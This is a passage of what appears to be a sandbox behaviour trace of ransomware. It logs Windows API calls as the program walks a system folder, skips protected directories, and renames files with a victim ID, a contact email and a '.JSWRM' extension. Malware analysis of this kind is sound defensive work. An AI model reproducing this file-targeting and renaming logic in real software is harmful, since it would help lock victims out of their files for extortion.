lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0069.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0069.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0069.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0069.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f5f8 [0069.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.161] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0069.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.161] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463fb128, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xd005e363, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x463fb128, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x58e00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msadomd.dll", cAlternateFileName="")) returned 1 [0069.161] lstrcmpiW (lpString1="msadomd.dll", lpString2=".") returned 1 [0069.161] lstrcmpiW (lpString1="msadomd.dll", lpString2="..") returned 1 [0069.161] lstrcmpiW (lpString1="msadomd.dll", lpString2="...") returned 1 [0069.161] lstrcmpiW (lpString1="msadomd.dll", lpString2="windows") returned -1 [0069.161] lstrcmpiW (lpString1="msadomd.dll", lpString2="recovery") returned -1 [0069.162] lstrcmpiW (lpString1="msadomd.dll", lpString2="perflogs") returned -1 [0069.162] lstrcmpiW (lpString1="msadomd.dll", lpString2="documents and settings") returned 1 [0069.162] lstrcmpiW (lpString1="msadomd.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.162] lstrcmpiW (lpString1="msadomd.dll", lpString2="system volume information") returned -1 [0069.162] lstrcmpiW (lpString1="msadomd.dll", lpString2="msocache") returned -1 [0069.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadomd.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadomd.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadomd.dll", lpUsedDefaultChar=0x0) returned 11 [0069.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadomd.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadomd.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadomd.dll", lpUsedDefaultChar=0x0) returned 11 [0069.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0069.162] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x437960ad, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x437960ad, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x437960ad, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3600, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msadomd28.tlb", cAlternateFileName="")) returned 1 [0069.162] lstrcmpiW (lpString1="msadomd28.tlb", lpString2=".") returned 1 [0069.162] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="..") returned 1 [0069.162] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="...") returned 1 [0069.162] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="windows") returned -1 [0069.162] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="recovery") returned -1 [0069.162] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="perflogs") returned -1 [0069.162] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="documents and settings") returned 1 [0069.162] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="$RECYCLE.BIN") returned 1 [0069.162] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="system volume information") returned -1 [0069.162] lstrcmpiW (lpString1="msadomd28.tlb", lpString2="msocache") returned -1 [0069.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadomd28.tlb", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadomd28.tlb", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadomd28.tlb", lpUsedDefaultChar=0x0) returned 13 [0069.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadomd28.tlb", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadomd28.tlb", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadomd28.tlb", lpUsedDefaultChar=0x0) returned 13 [0069.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0069.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.163] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9170201855694368) returned 0 [0069.163] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.163] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.163] CloseHandle (hObject=0xffffffff) returned 1 [0069.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0069.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0069.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0069.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0069.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23ef08 [0069.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.163] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.163] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\msadomd28.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\msadomd28.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0069.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.164] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msador15.dll", cAlternateFileName="")) returned 1 [0069.164] lstrcmpiW (lpString1="msador15.dll", lpString2=".") returned 1 [0069.164] lstrcmpiW (lpString1="msador15.dll", lpString2="..") returned 1 [0069.164] lstrcmpiW (lpString1="msador15.dll", lpString2="...") returned 1 [0069.164] lstrcmpiW (lpString1="msador15.dll", lpString2="windows") returned -1 [0069.164] lstrcmpiW (lpString1="msador15.dll", lpString2="recovery") returned -1 [0069.164] lstrcmpiW (lpString1="msador15.dll", lpString2="perflogs") returned -1 [0069.164] lstrcmpiW (lpString1="msador15.dll", lpString2="documents and settings") returned 1 [0069.164] lstrcmpiW (lpString1="msador15.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.164] lstrcmpiW (lpString1="msador15.dll", lpString2="system volume information") returned -1 [0069.164] lstrcmpiW (lpString1="msador15.dll", lpString2="msocache") returned -1 [0069.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msador15.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msador15.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msador15.dll", lpUsedDefaultChar=0x0) returned 12 [0069.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msador15.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msador15.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msador15.dll", lpUsedDefaultChar=0x0) returned 12 [0069.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.164] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.164] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0069.164] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x438ed65e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x438ed65e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x438ed65e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8c00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msador28.tlb", cAlternateFileName="")) returned 1 [0069.164] lstrcmpiW (lpString1="msador28.tlb", lpString2=".") returned 1 [0069.164] lstrcmpiW (lpString1="msador28.tlb", lpString2="..") returned 1 [0069.164] lstrcmpiW (lpString1="msador28.tlb", lpString2="...") returned 1 [0069.164] lstrcmpiW (lpString1="msador28.tlb", lpString2="windows") returned -1 [0069.164] lstrcmpiW (lpString1="msador28.tlb", lpString2="recovery") returned -1 [0069.164] lstrcmpiW (lpString1="msador28.tlb", lpString2="perflogs") returned -1 [0069.164] lstrcmpiW (lpString1="msador28.tlb", lpString2="documents and settings") returned 1 [0069.164] lstrcmpiW (lpString1="msador28.tlb", lpString2="$RECYCLE.BIN") returned 1 [0069.164] lstrcmpiW (lpString1="msador28.tlb", lpString2="system volume information") returned -1 [0069.165] lstrcmpiW (lpString1="msador28.tlb", lpString2="msocache") returned -1 [0069.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0069.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msador28.tlb", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msador28.tlb", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msador28.tlb", lpUsedDefaultChar=0x0) returned 12 [0069.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msador28.tlb", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msador28.tlb", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msador28.tlb", lpUsedDefaultChar=0x0) returned 12 [0069.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0069.165] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0069.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.165] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0069.165] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.166] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9169171063542368) returned 0 [0069.166] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0069.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0069.166] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0069.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.166] CloseHandle (hObject=0xffffffff) returned 1 [0069.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0069.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0069.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0069.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0069.166] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0069.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0069.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0069.166] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f158 [0069.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0069.166] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0069.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0069.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.166] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0069.166] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463fb128, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xc5b43065, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x463fb128, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x62e00, dwReserved0=0x60002, dwReserved1=0x232faa, cFileName="msadox.dll", cAlternateFileName="")) returned 1 [0069.167] lstrcmpiW (lpString1="msadox.dll", lpString2=".") returned 1 [0069.167] lstrcmpiW (lpString1="msadox.dll", lpString2="..") returned 1 [0069.167] lstrcmpiW (lpString1="msadox.dll", lpString2="...") returned 1 [0069.167] lstrcmpiW (lpString1="msadox.dll", lpString2="windows") returned -1 [0069.167] lstrcmpiW (lpString1="msadox.dll", lpString2="recovery") returned -1 [0069.167] lstrcmpiW (lpString1="msadox.dll", lpString2="perflogs") returned -1 [0069.167] lstrcmpiW (lpString1="msadox.dll", lpString2="documents and settings") returned 1 [0069.167] lstrcmpiW (lpString1="msadox.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.167] lstrcmpiW (lpString1="msadox.dll", lpString2="system volume information") returned -1 [0069.167] lstrcmpiW (lpString1="msadox.dll", lpString2="msocache") returned -1 [0069.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadox.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadox.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msadox.dll", lpUsedDefaultChar=0x0) returned 10 [0069.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.167] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msadox.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.167] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 